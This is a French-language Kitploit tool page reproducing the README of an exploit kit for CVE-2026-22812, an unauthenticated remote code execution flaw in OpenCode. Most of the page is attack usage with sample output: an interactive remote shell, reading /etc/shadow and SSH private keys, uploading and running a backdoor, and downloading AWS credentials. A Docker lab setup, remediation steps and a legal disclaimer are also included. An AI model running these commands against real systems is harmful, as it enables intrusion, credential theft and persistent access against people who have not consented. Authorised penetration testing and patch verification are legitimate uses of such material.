Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22812-exploit — # Kit d'exploitation pour CVE-2026-22812 (RCE non authentifié OpenCode) offrant un shell interactif, l'exécution de commandes arbitraires, le téléversement/téléchargement de fichiers et l'énumération du système pour des tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

# Kit d'exploitation pour CVE-2026-22812 (RCE non authentifié OpenCode) offrant un shell interactif, l'exécution de commandes arbitraires, le téléversement/téléchargement de fichiers et l'énumération du système pour des tests de sécurité autorisés.

Voir le dépôt
336il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil d'exploitation CVE-2026-22812

Python CVSS

Kit d'exploitation complet pour CVE-2026-22812 - RCE non authentifiée OpenCode


🎯 Présentation

L'outil d'exploitation CVE-2026-22812 est un framework d'exploitation complet pour la vulnérabilité d'exécution de code à distance non authentifiée OpenCode. Cet outil propose plusieurs méthodes d'exploitation, notamment un shell interactif, des opérations sur les fichiers et l'énumération du système.

Détails de la vulnérabilité

  • ID CVE : CVE-2026-22812
  • Produit concerné : OpenCode < 1.0.216
  • Score CVSS : 8,8 (Élevé)
  • Vecteur d'attaque : Réseau
  • Authentification : Aucune requise
  • Impact : Compromission totale du système

✨ Fonctionnalités

🔓 Capacités d'exploitation

  • ✅ Création de session non authentifiée
  • ✅ Exécution de commandes arbitraires (RCE)
  • ✅ Shell interactif avec historique des commandes
  • ✅ Téléversement/Téléchargement de fichiers
  • ✅ Lecture de fichiers arbitraires
  • ✅ Création de session PTY
  • ✅ Énumération du système
  • ✅ Prise en charge des proxys (compatible Burp Suite)

📦 Installation

Prérequis

  • Python 3.7+
  • pip
  • Bibliothèque requests

Installation rapide

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Installer les dépendances
pip3 install -r requirements.txt

Installation manuelle

root@kitploit:~
pip3 install requests urllib3

🚀 Utilisation

Exploitation de base

1. Vérifier que la cible est vulnérable

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 --verify

Sortie :

root@kitploit:~
[+] La cible est VULNÉRABLE à CVE-2026-22812 !
[+] ID de session : abc123def456

2. Exécuter une commande unique

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -c "id"

Sortie :

root@kitploit:~
[*] Création de la session...
[+] Session créée : abc123def456
[+] La cible est VULNÉRABLE !

[*] Exécution : id
[+] Commande exécutée avec succès

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. Mode shell interactif

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -i

Session interactive :

root@kitploit:~
[+] Session créée : abc123def456
[+] La cible est VULNÉRABLE !

[*] Entrée en mode shell interactif
[!] Tapez 'help' pour les commandes, 'exit' pour quitter

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Lecture du fichier : /etc/hostname
[+] Fichier lu avec succès (10 octets)
dev-server-01

developer@target$ exit
[*] Sortie...

📚 Utilisation détaillée

Exécution de commandes

root@kitploit:~
# Commande unique
python3 exploit.py -t http://target:4096 -c "whoami"

# Commande complexe
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Commandes multiples
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

Opérations sur les fichiers

Lire des fichiers

root@kitploit:~
# Lire des fichiers sensibles
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

Téléverser des fichiers

root@kitploit:~
# Téléverser un script shell
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Téléverser un binaire
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Téléverser avec exécution
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

Télécharger des fichiers

root@kitploit:~
# Télécharger la configuration
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Télécharger les identifiants
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Télécharger le code source
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

Énumération du système

root@kitploit:~
# Collecter les informations système
python3 exploit.py -t http://target:4096 --sysinfo

Sortie :

root@kitploit:~
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

Remédiation

  1. Mettre à jour immédiatement : npm install -g opencode-ai@latest
  2. Tuer les processus : pkill -f opencode
  3. Vérifier les journaux : Examiner les journaux système pour détecter des indicateurs de compromission
  4. Révoquer les identifiants : Changer les mots de passe, les clés SSH
  5. Auditer les systèmes : Rechercher des portes dérobées

🧪 Configuration du laboratoire de test

Utilisation de Docker (recommandé)

root@kitploit:~
# Dockerfile pour OpenCode vulnérable
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
root@kitploit:~
# Construire et exécuter
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Tester l'exploit
python3 exploit.py -t http://localhost:4096 -i

Configuration manuelle

root@kitploit:~
# Installer la version vulnérable
npm install -g [email protected]

# Démarrer OpenCode
opencode

# Dans un autre terminal, exécuter l'exploit
python3 exploit.py -t http://localhost:4096 --verify

⚠️ Ne déployez jamais de versions vulnérables en production !


📚 Références

Informations sur la vulnérabilité

  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • Avis GitHub : https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ Avertissement légal

À LIRE ATTENTIVEMENT

Cet outil est fourni UNIQUEMENT POUR LES TESTS DE SÉCURITÉ AUTORISÉS.

❌ Utilisation interdite

  • Accès non autorisé aux systèmes
  • Analyse sans permission
  • Toute activité illégale
  • Fins malveillantes
  • Systèmes de production sans autorisation

Avis légal

Les auteurs :

  • NE cautionnent PAS l'utilisation illégale
  • NE sont PAS responsables d'une mauvaise utilisation
  • NE soutiendront PAS les activités illégales
  • N'ASSUMENT AUCUNE RESPONSABILITÉ

En utilisant cet outil, vous acceptez de :

  • Obtenir une autorisation appropriée
  • Vous conformer à toutes les lois
  • Accepter l'entière responsabilité
  • Utiliser de manière éthique et responsable

UTILISATION À VOS PROPRES RISQUES


⭐ Mettez une étoile si utile ! ⭐
Réservé aux tests de sécurité autorisés

Télécharger l’outil